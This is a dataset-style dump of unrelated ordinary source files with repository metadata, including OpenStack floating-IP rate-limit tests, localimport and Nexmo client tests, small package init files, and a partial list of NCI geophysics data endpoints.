| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
31c83d0e8d37614436272b1e59ab628bb5a816fc
| 131
|
py
|
Python
|
openrobot_cli/utils.py
|
OpenRobot-Packages/OpenRobot-CLI
|
57574cd2cafc6619d8fec77d083b79a11260846d
|
[
"MIT"
] | 3
|
2022-01-05T09:13:10.000Z
|
2022-01-06T15:08:37.000Z
|
openrobot_cli/utils.py
|
OpenRobot-Packages/OpenRobot-CLI
|
57574cd2cafc6619d8fec77d083b79a11260846d
|
[
"MIT"
] | null | null | null |
openrobot_cli/utils.py
|
OpenRobot-Packages/OpenRobot-CLI
|
57574cd2cafc6619d8fec77d083b79a11260846d
|
[
"MIT"
] | 2
|
2022-01-09T05:02:57.000Z
|
2022-01-23T08:40:24.000Z
|
import click
def blue_text(text):
return click.style(text, fg="blue")
def error(text):
return click.style(text, fg="red")
| 18.714286
| 39
| 0.687023
| 21
| 131
| 4.238095
| 0.47619
| 0.224719
| 0.337079
| 0.449438
| 0.58427
| 0.58427
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160305
| 131
| 7
| 40
| 18.714286
| 0.809091
| 0
| 0
| 0
| 0
| 0
| 0.05303
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
7309f5aa1a55b59db43e3ba7e22efd93e510e100
| 9,476
|
py
|
Python
|
nuage_tempest_plugin/tests/api/floating_ip/test_nuage_bidirectional_fip_rate_limit.py
|
nuagenetworks/nuage-tempest-plugin
|
ac1bfb0709c7bbaf04017af3050fb3ed1ad1324a
|
[
"Apache-1.1"
] | 1
|
2021-01-03T01:47:51.000Z
|
2021-01-03T01:47:51.000Z
|
nuage_tempest_plugin/tests/api/floating_ip/test_nuage_bidirectional_fip_rate_limit.py
|
nuagenetworks/nuage-tempest-plugin
|
ac1bfb0709c7bbaf04017af3050fb3ed1ad1324a
|
[
"Apache-1.1"
] | null | null | null |
nuage_tempest_plugin/tests/api/floating_ip/test_nuage_bidirectional_fip_rate_limit.py
|
nuagenetworks/nuage-tempest-plugin
|
ac1bfb0709c7bbaf04017af3050fb3ed1ad1324a
|
[
"Apache-1.1"
] | 1
|
2020-10-16T12:04:39.000Z
|
2020-10-16T12:04:39.000Z
|
# Copyright 2015 Alcatel-Lucent
# All Rights Reserved.
from tempest.test import decorators
from nuage_tempest_plugin.lib.test import nuage_test
from nuage_tempest_plugin.lib.topology import Topology
from nuage_tempest_plugin.lib.utils import constants
from . import base_nuage_bidirectional_fip_rate_limit
LOG = Topology.get_logger(__name__)
class TestNuageBidirectionalFipRateLimit(
base_nuage_bidirectional_fip_rate_limit.
NuageBidirectionalFipRateLimitBase):
"""TestNuageBidirectionalFipRateLimit
Tests per FIP rate limiting using the neutron REST client
Create a Floating IP
Update a Floating IP
List all Floating IPs
v2.0 of the Neutron API is assumed. It is also assumed that the following
options are defined in the [network] section of etc/tempest.conf:
public_network_id which is the id for the external network present
"""
@classmethod
def resource_setup(cls):
super(TestNuageBidirectionalFipRateLimit, cls).resource_setup()
@decorators.attr(type='smoke')
@nuage_test.header()
def test_create_floatingip_with_rate_limit_normal_value(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 2000, 3000)
self._update_fip_with_fip_rate_limit(self.ports[0], fip, 5000, 10000)
@nuage_test.header()
def test_show_floatingip_with_rate_limit_normal_value(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 4000, 2000)
self._show_fip_with_fip_rate_limit(self.ports[0], fip, 4000, 2000)
@nuage_test.header()
# OPENSTACK-1583
def test_create_floatingip_with_rate_limit_minimal_value(self):
self._create_fip_with_fip_rate_limit(self.ports[0], '0', '0')
@nuage_test.header()
def test_create_floatingip_with_rate_limit_maximal_value(self):
self._create_fip_with_fip_rate_limit(self.ports[0],
constants.MAX_INT,
constants.MAX_INT)
@nuage_test.header()
def test_create_floatingip_with_rate_limit_high_value(self):
self._create_fip_with_fip_rate_limit(self.ports[0], 100000, 900000)
# @nuage_test.header()
# this test case will be moved to negative cases for this feature
# message': u'Bad request: nuage_ingress_fip_rate_kbps value cannot be
# in fraction'
# def test_create_floatingip_with_rate_limit_fractional_value(self):
# self._create_fip_with_fip_rate_limit(self.ports[0], 0.5, 0.5)
@nuage_test.header()
def test_create_floatingip_with_rate_limit_unlimited_value(self):
self._create_fip_with_fip_rate_limit(self.ports[0],
constants.UNLIMITED,
constants.UNLIMITED)
@nuage_test.header()
def test_update_floatingip_with_rate_limit_minimal_value(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 2000, 5000)
self._update_fip_with_fip_rate_limit(self.ports[0], fip, 0, 0)
@nuage_test.header()
def test_update_floatingip_with_rate_limit_unlimited_value(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 3000, 5000)
self._update_fip_with_fip_rate_limit(self.ports[0], fip,
constants.UNLIMITED,
constants.UNLIMITED)
@nuage_test.header()
def test_update_floatingip_with_rate_limit_maximal_value(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 3000, 5000)
self._update_fip_with_fip_rate_limit(self.ports[0], fip,
constants.MAX_INT,
constants.MAX_INT)
def test_update_floatingip_with_rate_limit_high_value(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 3000, 5000)
self._update_fip_with_fip_rate_limit(self.ports[0], fip,
100000, 100000)
@nuage_test.header()
def test_list_floatingip_does_not_show_rate_limit_value(self):
def get_attr(_dict, _key):
return _dict[_key]
fip1 = self._create_fip_with_fip_rate_limit(self.ports[0], 10)
fip2 = self._create_fip_with_fip_rate_limit(self.ports[1], 20)
body = self.floating_ips_client.list_floatingips()
fip_list = body['floatingips']
# Floating ips are in the list
self.assertIn(fip1['id'],
[fip['id'] for fip in fip_list])
self.assertIn(fip2['id'],
[fip['id'] for fip in fip_list])
get_fips = [_fip for _fip in fip_list if _fip['id'] == fip1['id']]
self.assertRaises(KeyError, get_attr, get_fips[0], 'nuage_fip_rate')
# ONLY INGRESS DIRECTION TESTS
@decorators.attr(type='smoke')
@nuage_test.header()
def test_create_floatingip_with_rate_limit_normal_value_ingress(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 2000)
self._update_fip_with_fip_rate_limit(self.ports[0], fip, 5000)
@nuage_test.header()
def test_show_floatingip_with_rate_limit_normal_value_ingress(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 4000)
self._show_fip_with_fip_rate_limit(self.ports[0], fip, 4000)
@nuage_test.header()
# OPENSTACK-1583
def test_create_floatingip_with_rate_limit_minimal_value_ingress(self):
self._create_fip_with_fip_rate_limit(self.ports[0], '0')
@nuage_test.header()
def test_create_floatingip_with_rate_limit_maximal_value_ingress(self):
self._create_fip_with_fip_rate_limit(self.ports[0], constants.MAX_INT)
@nuage_test.header()
def test_create_floatingip_with_rate_limit_high_value_ingress(self):
self._create_fip_with_fip_rate_limit(self.ports[0], 100000)
@nuage_test.header()
def test_create_floatingip_with_rate_limit_unlimited_value_ingress(self):
self._create_fip_with_fip_rate_limit(self.ports[0],
constants.UNLIMITED)
@nuage_test.header()
def test_update_floatingip_with_rate_limit_minimal_value_ingress(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 2000)
self._update_fip_with_fip_rate_limit(self.ports[0], fip, 0)
@nuage_test.header()
def test_update_floatingip_with_rate_limit_unlimited_value_ingress(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 3000)
self._update_fip_with_fip_rate_limit(self.ports[0], fip,
constants.UNLIMITED)
@nuage_test.header()
def test_update_floatingip_with_rate_limit_high_value_ingress(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 3000)
self._update_fip_with_fip_rate_limit(self.ports[0], fip, 100000)
# ONLY EGRESS DIRECTION TESTS
@decorators.attr(type='smoke')
@nuage_test.header()
def test_create_floatingip_with_rate_limit_normal_value_egress(self):
fip = self._create_fip_with_fip_rate_limit(
self.ports[0], egress_rate_limit=2000)
self._update_fip_with_fip_rate_limit(
self.ports[0], fip, egress_rate_limit=5000)
@nuage_test.header()
def test_show_floatingip_with_rate_limit_normal_value_egress(self):
fip = self._create_fip_with_fip_rate_limit(
self.ports[0], egress_rate_limit=4000)
self._show_fip_with_fip_rate_limit(
self.ports[0], fip, egress_rate_limit=4000)
@nuage_test.header()
# OPENSTACK-1583
def test_create_floatingip_with_rate_limit_minimal_value_egress(self):
self._create_fip_with_fip_rate_limit(
self.ports[0], egress_rate_limit='0')
@nuage_test.header()
def test_create_floatingip_with_rate_limit_maximal_value_egress(self):
self._create_fip_with_fip_rate_limit(
self.ports[0], egress_rate_limit=constants.MAX_INT)
@nuage_test.header()
def test_create_floatingip_with_rate_limit_high_value_egress(self):
self._create_fip_with_fip_rate_limit(
self.ports[0], egress_rate_limit=100000)
@nuage_test.header()
def test_create_floatingip_with_rate_limit_unlimited_value_egress(self):
self._create_fip_with_fip_rate_limit(
self.ports[0], egress_rate_limit=constants.UNLIMITED)
@nuage_test.header()
def test_update_floatingip_with_rate_limit_minimal_value_egress(self):
fip = self._create_fip_with_fip_rate_limit(
self.ports[0], egress_rate_limit=2000)
self._update_fip_with_fip_rate_limit(
self.ports[0], fip, egress_rate_limit=0)
@nuage_test.header()
def test_update_floatingip_with_rate_limit_unlimited_value_egress(self):
fip = self._create_fip_with_fip_rate_limit(
self.ports[0], egress_rate_limit=3000)
self._update_fip_with_fip_rate_limit(
self.ports[0], fip, egress_rate_limit=constants.UNLIMITED)
@nuage_test.header()
def test_update_floatingip_with_rate_limit_high_value_egress(self):
self._create_fip_with_fip_rate_limit(
self.ports[0], egress_rate_limit=3000)
@nuage_test.header()
def test_create_floatingip_with_rate_limit_backward(self):
self._create_fip_with_fip_rate_limit_backward(
self.ports[0], rate_limit=3000)
| 41.929204
| 78
| 0.703356
| 1,301
| 9,476
| 4.637971
| 0.108378
| 0.140206
| 0.097448
| 0.109049
| 0.813391
| 0.798475
| 0.779085
| 0.771959
| 0.759198
| 0.746271
| 0
| 0.034117
| 0.214331
| 9,476
| 225
| 79
| 42.115556
| 0.77636
| 0.091283
| 0
| 0.477419
| 0
| 0
| 0.006543
| 0
| 0
| 0
| 0
| 0
| 0.019355
| 1
| 0.206452
| false
| 0
| 0.032258
| 0.006452
| 0.251613
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b45db79ba520d28993599f35a1977b358b36b493
| 40
|
py
|
Python
|
handlers/__init__.py
|
shishyando/random-choice-bot
|
dc0f923d2394f581365736b050a2c00f56055f1e
|
[
"Apache-2.0"
] | null | null | null |
handlers/__init__.py
|
shishyando/random-choice-bot
|
dc0f923d2394f581365736b050a2c00f56055f1e
|
[
"Apache-2.0"
] | null | null | null |
handlers/__init__.py
|
shishyando/random-choice-bot
|
dc0f923d2394f581365736b050a2c00f56055f1e
|
[
"Apache-2.0"
] | null | null | null |
from . import inline
from . import user
| 13.333333
| 20
| 0.75
| 6
| 40
| 5
| 0.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 40
| 2
| 21
| 20
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6f203c90325878ce6f57dd701c1c3c5b51a3865e
| 42
|
py
|
Python
|
{{ cookiecutter.project_slug }}/api/api/__init__.py
|
jkenlooper/llama3-weboftomorrow-com
|
a62fcccd0c3b1627dd596229b4f752f4ef49c295
|
[
"MIT"
] | 1
|
2018-08-26T19:41:28.000Z
|
2018-08-26T19:41:28.000Z
|
{{ cookiecutter.project_slug }}/api/api/__init__.py
|
jkenlooper/cookiecutter-website
|
a62fcccd0c3b1627dd596229b4f752f4ef49c295
|
[
"MIT"
] | null | null | null |
{{ cookiecutter.project_slug }}/api/api/__init__.py
|
jkenlooper/cookiecutter-website
|
a62fcccd0c3b1627dd596229b4f752f4ef49c295
|
[
"MIT"
] | null | null | null |
"API for {{ cookiecutter.project_name }}"
| 21
| 41
| 0.714286
| 5
| 42
| 5.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119048
| 42
| 1
| 42
| 42
| 0.783784
| 0.928571
| 0
| 0
| 0
| 0
| 0.928571
| 0.595238
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
48d03128a19361313783669076ec4c090ad262f3
| 1,885
|
py
|
Python
|
tests/test_localimport.py
|
OutHereVR/py-localimport
|
69af71c37f8bd3b2121ec39083dff18a9a2d04a1
|
[
"MIT"
] | 29
|
2017-03-10T18:00:11.000Z
|
2021-02-22T22:56:36.000Z
|
tests/test_localimport.py
|
OutHereVR/py-localimport
|
69af71c37f8bd3b2121ec39083dff18a9a2d04a1
|
[
"MIT"
] | 17
|
2017-04-26T14:13:49.000Z
|
2018-07-07T21:37:35.000Z
|
lib/py-localimport/tests/test_localimport.py
|
NiklasRosenstein/c4ddocs
|
9be4efba47d0dbd5787622933b21fdcf8fb5272e
|
[
"MIT"
] | 5
|
2017-07-21T22:24:15.000Z
|
2020-08-17T05:51:19.000Z
|
from nose.tools import *
from localimport import localimport
import os
import sys
modules_dir = os.path.join(os.path.dirname(__file__), 'modules')
def test_localimport_with_autodisable():
sys.path.append(modules_dir)
import another_module as mod_a
try:
with localimport('modules') as _imp:
import some_module
import another_module as mod_b
assert 'some_module' in sys.modules
assert sys.modules['another_module'] is mod_b
assert 'some_module' not in sys.modules
assert sys.modules['another_module'] is mod_a
assert mod_a is not mod_b
finally:
sys.path.remove(modules_dir)
del sys.modules['another_module']
def test_localimport_without_autodisable():
sys.path.append(modules_dir)
import another_module as mod_a
try:
with localimport('modules', do_autodisable=False) as _imp:
import some_module
import another_module as mod_b
assert 'some_module' in sys.modules
assert sys.modules['another_module'] is mod_b
assert mod_a is mod_b
assert 'some_module' not in sys.modules
assert sys.modules['another_module'] is mod_a
finally:
sys.path.remove(modules_dir)
del sys.modules['another_module']
def test_localimport_parent_dir():
with localimport('.', parent_dir=modules_dir) as _imp:
import some_module
assert 'some_module' not in sys.modules
assert 'another_module' not in sys.modules
def test_localimport_curdir():
with localimport('.') as _imp:
import some_module
assert 'some_module' not in sys.modules
assert 'another_module' not in sys.modules
def test_discover():
with localimport('.') as _imp:
assert_equals(sorted(x.name for x in _imp.discover()), ['another_module', 'some_module', 'test_localimport'])
with localimport('modules') as _imp:
assert_equals(sorted(x.name for x in _imp.discover()), ['another_module', 'some_module'])
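# Editorial sketch of the usage pattern the tests above exercise: vendored
# packages are importable only inside the with-block, after which sys.path and
# sys.modules are restored.  The 'vendor' directory and 'requests' module below
# are placeholders.
#
#     from localimport import localimport
#
#     with localimport('vendor') as _importer:
#         import requests          # resolved from ./vendor inside the block
#     # outside the block the import is undone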
| 29.920635
| 113
| 0.73634
| 277
| 1,885
| 4.747292
| 0.166065
| 0.114068
| 0.073004
| 0.082129
| 0.760456
| 0.743726
| 0.743726
| 0.743726
| 0.743726
| 0.743726
| 0
| 0
| 0.170822
| 1,885
| 62
| 114
| 30.403226
| 0.841331
| 0
| 0
| 0.68
| 0
| 0
| 0.145966
| 0
| 0
| 0
| 0
| 0
| 0.32
| 1
| 0.1
| false
| 0
| 0.42
| 0
| 0.52
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5b133e818c077a4d942304c2aacb38870c28f3a7
| 122
|
py
|
Python
|
tkitMarker/model/__init__.py
|
napoler/Bert-BiLSTM-CRF-pytorch
|
2768cfe59a90d45de487cd6efb364fe8c9749582
|
[
"MIT"
] | 1
|
2021-08-13T08:55:54.000Z
|
2021-08-13T08:55:54.000Z
|
tkitMarker/model/__init__.py
|
napoler/Bert-BiLSTM-CRF-pytorch
|
2768cfe59a90d45de487cd6efb364fe8c9749582
|
[
"MIT"
] | null | null | null |
tkitMarker/model/__init__.py
|
napoler/Bert-BiLSTM-CRF-pytorch
|
2768cfe59a90d45de487cd6efb364fe8c9749582
|
[
"MIT"
] | 2
|
2020-09-22T01:07:51.000Z
|
2021-08-13T08:55:51.000Z
|
# coding=utf-8
from .crf import CRF
from .bert_lstm_crf import BERT_LSTM_CRF
from .albert_lstm_crf import ALBERT_LSTM_CRF
| 24.4
| 44
| 0.836066
| 23
| 122
| 4.086957
| 0.391304
| 0.297872
| 0.234043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009259
| 0.114754
| 122
| 4
| 45
| 30.5
| 0.861111
| 0.098361
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5b1bda83166ab141804909c5fadada0c2969f1ff
| 167
|
py
|
Python
|
src/Samples/Sample.ImportResolver/Math/MathImpl/__init__.py
|
simplic-systems/Simplic.Dlr
|
614bca70cb2916cd85e34c6bb0b0cc56ce390e50
|
[
"MIT"
] | 3
|
2018-02-24T03:58:59.000Z
|
2020-02-12T06:56:56.000Z
|
src/Samples/Sample.ImportResolver/Math/MathImpl/__init__.py
|
simplic-systems/Simplic.Dlr
|
614bca70cb2916cd85e34c6bb0b0cc56ce390e50
|
[
"MIT"
] | 1
|
2015-12-23T22:54:56.000Z
|
2016-02-04T21:23:29.000Z
|
src/Samples/Sample.ImportResolver/Math/MathImpl/__init__.py
|
simplicbe/Simplic.Dlr
|
614bca70cb2916cd85e34c6bb0b0cc56ce390e50
|
[
"MIT"
] | 1
|
2018-02-19T02:41:11.000Z
|
2018-02-19T02:41:11.000Z
|
# Sample math package
print ('Begin import /Math/MathImpl/__init__.py')
import MathImpl
print ('End import /Math/MathImpl/__init__.py: ' + str(MathImpl.add(1, 2)))
| 41.75
| 75
| 0.724551
| 25
| 167
| 4.56
| 0.6
| 0.175439
| 0.315789
| 0.385965
| 0.421053
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013605
| 0.11976
| 167
| 4
| 75
| 41.75
| 0.755102
| 0.113772
| 0
| 0
| 0
| 0
| 0.545455
| 0.370629
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 1
| null | null | 0.666667
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
d2ddb6b8f431a24ae8776f0ed9993bcb49b97050
| 3,475
|
py
|
Python
|
tests/test_misc.py
|
harunpehlivan/nexmo-python
|
b102d4c619b41503fa9ff1274489adbe320fdfab
|
[
"MIT"
] | null | null | null |
tests/test_misc.py
|
harunpehlivan/nexmo-python
|
b102d4c619b41503fa9ff1274489adbe320fdfab
|
[
"MIT"
] | null | null | null |
tests/test_misc.py
|
harunpehlivan/nexmo-python
|
b102d4c619b41503fa9ff1274489adbe320fdfab
|
[
"MIT"
] | null | null | null |
from util import *
@responses.activate
def test_get(client, dummy_data):
stub(responses.GET, "https://api.nexmo.com/v1/applications")
host = "api.nexmo.com"
request_uri = "/v1/applications"
params = {"aaa": "xxx", "bbb": "yyy"}
response = client.get(host, request_uri, params=params)
assert isinstance(response, dict)
assert request_user_agent() == dummy_data.user_agent
assert "aaa=xxx" in request_query()
assert "bbb=yyy" in request_query()
@responses.activate
def test_get_with_auth(client, dummy_data):
stub(responses.GET, "https://api.nexmo.com/v1/applications")
host = "api.nexmo.com"
request_uri = "/v1/applications"
params = {"aaa": "xxx", "bbb": "yyy"}
response = client.get(host, request_uri, params=params, header_auth=True)
assert isinstance(response, dict)
assert request_user_agent() == dummy_data.user_agent
assert "aaa=xxx" in request_query()
assert "bbb=yyy" in request_query()
assert "Authorization" in request_headers()
assert request_headers()["Authorization"].startswith("Basic")
@responses.activate
def test_post(client, dummy_data):
stub(responses.POST, "https://api.nexmo.com/v1/applications")
host = "api.nexmo.com"
request_uri = "/v1/applications"
params = {"aaa": "xxx", "bbb": "yyy"}
response = client.post(host, request_uri, params)
assert isinstance(response, dict)
assert request_user_agent() == dummy_data.user_agent
assert "aaa=xxx" in request_body()
assert "bbb=yyy" in request_body()
@responses.activate
def test_post_with_auth(client, dummy_data):
stub(responses.POST, "https://api.nexmo.com/v1/applications")
host = "api.nexmo.com"
request_uri = "/v1/applications"
params = {"aaa": "xxx", "bbb": "yyy"}
response = client.post(host, request_uri, params, header_auth=True)
assert isinstance(response, dict)
assert request_user_agent() == dummy_data.user_agent
assert "aaa=xxx" in request_body()
assert "bbb=yyy" in request_body()
assert "Authorization" in request_headers()
assert request_headers()["Authorization"].startswith("Basic")
@responses.activate
def test_put(client, dummy_data):
stub(responses.PUT, "https://api.nexmo.com/v1/applications")
host = "api.nexmo.com"
request_uri = "/v1/applications"
params = {"aaa": "xxx", "bbb": "yyy"}
response = client.put(host, request_uri, params=params)
assert isinstance(response, dict)
assert request_user_agent() == dummy_data.user_agent
assert b"aaa" in request_body()
assert b"xxx" in request_body()
assert b"bbb" in request_body()
assert b"yyy" in request_body()
@responses.activate
def test_delete(client, dummy_data):
stub(responses.DELETE, "https://api.nexmo.com/v1/applications")
host = "api.nexmo.com"
request_uri = "/v1/applications"
response = client.delete(host, request_uri)
assert isinstance(response, dict)
assert request_user_agent() == dummy_data.user_agent
@responses.activate
def test_delete_with_auth(client, dummy_data):
stub(responses.DELETE, "https://api.nexmo.com/v1/applications")
host = "api.nexmo.com"
request_uri = "/v1/applications"
response = client.delete(host, request_uri, header_auth=True)
assert isinstance(response, dict)
assert request_user_agent() == dummy_data.user_agent
assert "Authorization" in request_headers()
assert request_headers()["Authorization"].startswith("Basic")
| 36.578947
| 77
| 0.705612
| 457
| 3,475
| 5.183807
| 0.102845
| 0.056986
| 0.065006
| 0.070916
| 0.987336
| 0.907556
| 0.907556
| 0.897425
| 0.870409
| 0.870409
| 0
| 0.004775
| 0.156259
| 3,475
| 94
| 78
| 36.968085
| 0.803206
| 0
| 0
| 0.75
| 0
| 0
| 0.196547
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.0875
| false
| 0
| 0.0125
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d2e113a58eac27c871105482f97790139040d27f
| 128
|
py
|
Python
|
swig/python/gdal.py
|
VisualAwarenessTech/gdal-2.2.1
|
5ea1c6671d6f0f3b93e9e9bf2a71da618c834e8d
|
[
"Apache-2.0"
] | 13
|
2015-11-18T18:26:34.000Z
|
2021-05-09T13:59:46.000Z
|
swig/python/gdal.py
|
VisualAwarenessTech/gdal-2.2.1
|
5ea1c6671d6f0f3b93e9e9bf2a71da618c834e8d
|
[
"Apache-2.0"
] | 7
|
2021-06-04T23:45:15.000Z
|
2022-03-12T00:44:14.000Z
|
swig/python/gdal.py
|
VisualAwarenessTech/gdal-2.2.1
|
5ea1c6671d6f0f3b93e9e9bf2a71da618c834e8d
|
[
"Apache-2.0"
] | 6
|
2019-02-03T14:19:32.000Z
|
2021-12-19T06:36:49.000Z
|
# import osgeo.gdal as a convenience
from osgeo.gdal import deprecation_warn
deprecation_warn('gdal')
from osgeo.gdal import *
| 21.333333
| 39
| 0.804688
| 19
| 128
| 5.315789
| 0.473684
| 0.267327
| 0.257426
| 0.376238
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 128
| 5
| 40
| 25.6
| 0.901786
| 0.265625
| 0
| 0
| 0
| 0
| 0.043478
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d2f44979d95f3f05ceeaf987e88d75423636710c
| 5,186
|
py
|
Python
|
explore_australia/endpoints.py
|
Cipahi/explore_australia
|
0080b8e1c8cd33d568b71915c598780e91a99b0b
|
[
"MIT"
] | 36
|
2019-03-05T06:51:40.000Z
|
2022-01-29T14:07:13.000Z
|
explore_australia/endpoints.py
|
khornlund/explore_australia
|
713fd714727ae7ff60eb033806c5180fdad1277f
|
[
"MIT"
] | 2
|
2019-03-08T12:40:03.000Z
|
2020-05-22T03:15:30.000Z
|
explore_australia/endpoints.py
|
khornlund/explore_australia
|
713fd714727ae7ff60eb033806c5180fdad1277f
|
[
"MIT"
] | 41
|
2019-03-05T02:27:11.000Z
|
2021-12-25T03:53:52.000Z
|
""" file: endpoints.py (explore_australia)
author: Jess Robertson, @jesserobertson
date: Tuesday, 05 March 2019
description: Endpoint locations for geophysical coverages on NCI
"""
RADMAP = {
'filtered_terrestrial_dose': 'http://dap-wms.nci.org.au/thredds/wcs/rr2/geophysics/radmap_v3_2015_filtered_dose/radmap_v3_2015_filtered_dose.nc',
'filtered_potassium_pct': 'http://dap-wms.nci.org.au/thredds/wcs/rr2/geophysics/radmap_v3_2015_filtered_pctk/radmap_v3_2015_filtered_pctk.nc',
'filtered_thorium_ppm': 'http://dap-wms.nci.org.au/thredds/wcs/rr2/geophysics/radmap_v3_2015_filtered_ppmth/radmap_v3_2015_filtered_ppmth.nc',
'filtered_uranium_ppm': 'http://dap-wms.nci.org.au/thredds/wcs/rr2/geophysics/radmap_v3_2015_filtered_ppmu/radmap_v3_2015_filtered_ppmu.nc'
}
MAGNETICS = {
'variable_reduction_to_pole': 'http://dap-wms.nci.org.au/thredds/wcs/rr2/geophysics/magmap_v6_2015_VRTP/magmap_v6_2015_VRTP.nc',
'total_magnetic_intensity': 'http://dap-wms.nci.org.au/thredds/wcs/rr2/geophysics/magmap_v6_2015/magmap_v6_2015.nc'
}
# For some reason a couple of these are b0rked
ASTER = {
'aloh_group_composition': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Aus_Mainland/Aus_Mainland_AlOH_group_composition_reprojected.nc4',
'ferrous_iron_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Aus_Mainland/Aus_Mainland_Ferrous_Iron_Index_reprojected.nc4',
'opaque_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Aus_Mainland/Aus_Mainland_Opaque_Index_reprojected.nc4',
'ferric_oxide_content': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Aus_Mainland/Aus_Mainland_Ferric_oxide_content_reprojected.nc4',
# 'feoh_group_content': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Aus_Mainland/Aus_Mainland_FeOH_group_content_reprojected.nc4',
'kaolin_group_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Aus_Mainland/Aus_Mainland_Kaolin_group_index_reprojected.nc4',
'tir_quartz_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/thermal/Aus_ASTER_L2EM_Quartz_Index_reprojected.nc4',
'mgoh_group_content': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Aus_Mainland/Aus_Mainland_MgOH_group_content_reprojected.nc4',
